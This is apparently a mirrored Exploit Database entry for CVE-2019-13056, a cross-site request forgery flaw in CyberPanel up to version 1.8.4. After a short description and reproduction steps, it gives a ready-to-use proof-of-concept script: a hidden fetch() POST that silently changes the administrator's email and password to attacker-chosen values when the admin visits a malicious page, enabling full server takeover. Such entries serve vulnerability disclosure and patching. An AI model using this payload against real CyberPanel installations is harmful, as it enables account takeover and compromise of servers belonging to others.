CyberPanel 1.8.4 – Cross-Site Request Forgery

• Exploit Database
• 35 阅读

• 作者： Bilgi Birikim Sistemleri
  日期： 2019-07-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47063/

• # Title: CyberPanel Administrator Account Takeover <= v1.8.4
  # Date: 30.06.2019
  # Author: Bilgi Birikim Sistemleri
  # Vendor Homepage: https://cyberpanel.net/
  # Version: Up to v1.8.4.
  # CVE: CVE-2019-13056
  # mturkyilmaz@bilgibirikim.com & bilgibirikim.com
  
  # Description:
  # Attacker can edit administrator's credentials like email, password.
  # Then, access the administration panel and takeover the server.
  # A CSRF vulnerability.
  
  # How to Reproduce:
  # Attacker will create a website,
  # CyberPanel administrator will visit that website,
  # Administrator's e-mail and password will be changed automatically.
  
  # PoC:
  <script>
  fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
  </script>